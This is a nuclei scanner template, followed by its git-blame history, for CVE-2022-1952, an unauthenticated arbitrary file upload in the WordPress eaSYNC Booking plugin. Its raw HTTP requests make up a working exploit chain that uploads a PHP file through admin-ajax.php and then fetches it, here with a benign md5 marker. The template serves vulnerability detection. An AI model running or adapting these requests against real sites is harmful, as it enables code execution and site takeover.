nuclei-templates/http/cves/2022/CVE-2022-1952.yaml

id: CVE-2022-1952

info:
  name: WordPress eaSYNC Booking <1.1.16 - Arbitrary File Upload
  author: theamanrawat
  severity: critical
  description: |
    WordPress eaSync Booking plugin bundle for hotel, restaurant and car rental before 1.1.16 is susceptible to arbitrary file upload. The plugin contains insufficient input validation of an AJAX action. An allowlist of valid file extensions is defined but is not used during the validation steps. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  reference:
    - https://wpscan.com/vulnerability/ecf61d17-8b07-4cb6-93a8-64c2c4fbbe04
    - https://wordpress.org/plugins/easync-booking/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1952
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-1952
    cwe-id: CWE-434
    epss-score: 0.95933
    cpe: cpe:2.3:a:syntactics:free_booking_plugin_for_hotels\,_restaurant_and_car_rental:*:*:*:*:*:wordpress:*:*
    epss-percentile: 0.99225
  metadata:
    max-request: 3
    verified: true
    framework: wordpress
    vendor: syntactics
    product: free_booking_plugin_for_hotels\,_restaurant_and_car_rental
  tags: cve,cve2022,wpscan,wordpress,easync-booking,unauth,wp,file-upload,wp-plugin,intrusive

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Cookie: PHPSESSID=a0d5959357e474aef655313f69891f37
        Content-Type: multipart/form-data; boundary=------------------------98efee55508c5059

        --------------------------98efee55508c5059
        Content-Disposition: form-data; name="action"

        easync_session_store
        --------------------------98efee55508c5059
        Content-Disposition: form-data; name="type"

        car
        --------------------------98efee55508c5059
        Content-Disposition: form-data; name="with_driver"

        self-driven
        --------------------------98efee55508c5059
        Content-Disposition: form-data; name="driver_license_image2"; filename="{{randstr}}.php"
        Content-Type: application/octet-stream

        <?php echo md5('CVE-2022-1952');?>

        --------------------------98efee55508c5059--
      - |
        GET /wp-admin/admin-ajax.php?action=easync_success_and_save HTTP/1.1
        Host: {{Hostname}}
        Cookie: PHPSESSID=a0d5959357e474aef655313f69891f37
      - |
        GET /wp-content/uploads/{{filename}}.php HTTP/1.1
        Host: {{Hostname}}

    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - contains(header_3, "text/html")
          - status_code_3 == 200
          - contains(body_1, 'success\":true')
          - contains(body_3, 'e0d7fcf2c9f63143b6278a3e40f6bea9')
        condition: and

    extractors:
      - type: regex
        name: filename
        group: 1
        regex:
          - 'wp-content\\\/uploads\\\/([0-9a-zA-Z]+).php'
        internal: true
Added template for CVE-2022-1952 2022-10-29 11:20:01 +00:00			`id: CVE-2022-1952`

			`info:`
Enhancement: cves/2022/CVE-2022-1952.yaml by md 2023-04-07 15:29:08 +00:00			`name: WordPress eaSYNC Booking <1.1.16 - Arbitrary File Upload`
Added template for CVE-2022-1952 2022-10-29 11:20:01 +00:00			`author: theamanrawat`
			`severity: critical`
			`description: \|`
Enhancement: cves/2022/CVE-2022-1952.yaml by md 2023-04-07 15:29:08 +00:00			`WordPress eaSync Booking plugin bundle for hotel, restaurant and car rental before 1.1.16 is susceptible to arbitrary file upload. The plugin contains insufficient input validation of an AJAX action. An allowlist of valid file extensions is defined but is not used during the validation steps. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.`
Added template for CVE-2022-1952 2022-10-29 11:20:01 +00:00			`reference:`
			`- https://wpscan.com/vulnerability/ecf61d17-8b07-4cb6-93a8-64c2c4fbbe04`
			`- https://wordpress.org/plugins/easync-booking/`
			`- https://nvd.nist.gov/vuln/detail/CVE-2022-1952`
			`classification:`
Auto Generated CVE annotations [Fri Nov 11 20:30:02 UTC 2022] :robot: 2022-11-11 20:30:02 +00:00			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 9.8`
Added template for CVE-2022-1952 2022-10-29 11:20:01 +00:00			`cve-id: CVE-2022-1952`
Auto Generated CVE annotations [Fri Nov 11 20:30:02 UTC 2022] :robot: 2022-11-11 20:30:02 +00:00			`cwe-id: CWE-434`
Added EPSS Percentile 2023-08-31 11:46:18 +00:00			`epss-score: 0.95933`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`cpe: cpe:2.3:a:syntactics:free_booking_plugin_for_hotels\,_restaurant_and_car_rental::::::wordpress::*`
Added EPSS Percentile 2023-08-31 11:46:18 +00:00			`epss-percentile: 0.99225`
Added template for CVE-2022-1952 2022-10-29 11:20:01 +00:00			`metadata:`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`max-request: 3`
Update CVE-2022-1952.yaml 2022-11-12 07:18:56 +00:00			`verified: true`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`framework: wordpress`
			`vendor: syntactics`
			`product: free_booking_plugin_for_hotels\,_restaurant_and_car_rental`
Update CVE-2022-1952.yaml 2022-11-12 07:18:56 +00:00			`tags: cve,cve2022,wpscan,wordpress,easync-booking,unauth,wp,file-upload,wp-plugin,intrusive`
Added template for CVE-2022-1952 2022-10-29 11:20:01 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Added template for CVE-2022-1952 2022-10-29 11:20:01 +00:00			`- raw:`
			`- \|`
			`POST /wp-admin/admin-ajax.php HTTP/1.1`
			`Host: {{Hostname}}`
			`Cookie: PHPSESSID=a0d5959357e474aef655313f69891f37`
			`Content-Type: multipart/form-data; boundary=------------------------98efee55508c5059`

			`--------------------------98efee55508c5059`
			`Content-Disposition: form-data; name="action"`

			`easync_session_store`
			`--------------------------98efee55508c5059`
			`Content-Disposition: form-data; name="type"`

			`car`
			`--------------------------98efee55508c5059`
			`Content-Disposition: form-data; name="with_driver"`

			`self-driven`
			`--------------------------98efee55508c5059`
Update CVE-2022-1952.yaml 2022-11-11 20:13:12 +00:00			`Content-Disposition: form-data; name="driver_license_image2"; filename="{{randstr}}.php"`
Added template for CVE-2022-1952 2022-10-29 11:20:01 +00:00			`Content-Type: application/octet-stream`

Update CVE-2022-1952.yaml 2022-11-04 07:07:38 +00:00			`<?php echo md5('CVE-2022-1952');?>`
Added template for CVE-2022-1952 2022-10-29 11:20:01 +00:00
			`--------------------------98efee55508c5059--`
			`- \|`
			`GET /wp-admin/admin-ajax.php?action=easync_success_and_save HTTP/1.1`
			`Host: {{Hostname}}`
			`Cookie: PHPSESSID=a0d5959357e474aef655313f69891f37`
			`- \|`
			`GET /wp-content/uploads/{{filename}}.php HTTP/1.1`
			`Host: {{Hostname}}`

			`req-condition: true`
			`matchers:`
			`- type: dsl`
			`dsl:`
removed deprecated header syntax with latest one 2023-06-19 21:10:30 +00:00			`- contains(header_3, "text/html")`
Added template for CVE-2022-1952 2022-10-29 11:20:01 +00:00			`- status_code_3 == 200`
Update CVE-2022-1952.yaml 2022-11-04 07:07:38 +00:00			`- contains(body_1, 'success\":true')`
			`- contains(body_3, 'e0d7fcf2c9f63143b6278a3e40f6bea9')`
Added template for CVE-2022-1952 2022-10-29 11:20:01 +00:00			`condition: and`

			`extractors:`
			`- type: regex`
			`name: filename`
			`group: 1`
			`regex:`
Update CVE-2022-1952.yaml 2022-11-04 07:07:38 +00:00			`- 'wp-content\\\/uploads\\\/([0-9a-zA-Z]+).php'`
			`internal: true`